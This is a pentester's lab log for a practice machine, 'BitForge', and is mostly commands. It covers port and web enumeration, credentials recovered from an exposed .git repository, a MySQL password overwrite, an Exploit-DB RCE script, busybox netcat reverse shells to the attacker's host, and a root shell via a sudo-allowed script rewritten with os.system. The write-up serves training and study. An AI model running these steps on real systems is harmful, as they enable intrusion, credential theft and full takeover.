BitForge
๐งช Pentest Log: {{date:2025-08-03}}
๐ Target Information
- Machine Name: BitForge
- IP Address: 192.168.223.186
- Operating System: Linux
ip=192.168.223.186
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
found .git
python3 git_dumper.py http://bitforge.lab ~/Documents/oscp/play_ground/BitForge
git log
git show 18833b811e967ab8bec631344a6809aa4af59480
BitForgeAdmin:B1tForG3S0ftw4r3S0lutions
Port 3306
mysql -h $ip -u BitForgeAdmin -p --skip-ssl-verify-server-cert
UPDATE planning_user SET password='df5b909019c9b1659e86e0d6bf8da81d6fa3499e' WHERE user_id='ADM';
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://www.exploit-db.com/exploits/52082
python3 52082.py -t http://plan.bitforge.lab/www -u admin -p admin
busybox nc 192.168.45.163 3306 -e /bin/bash
nc -lvnp 3306
use pspy64 found jack's password
./pspy64
jack:j4cKF0rg3@445
๐งฌ Privilege Escalation
๐ค Current Access
- User: jack
- Groups: jack
- Shell Type: ssh
๐ Enumeration
Sudo:
sudo -l
found
User jack may run the following commands on bitforge:
(root) NOPASSWD: /usr/bin/flask_password_changer
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Sudo Misconfiguration
- Target Binary/Service: flask_password_changer
- Reference / Source: N/A
๐ง Exploit Steps
- Setup
cd /opt/password_change_app
rm app.py
vim app.py
import os
os.system("busybox nc 192.168.45.163 3306 -e bash")
- Smash to root
nc -lvnp 3306
sudo /usr/bin/flask_password_changer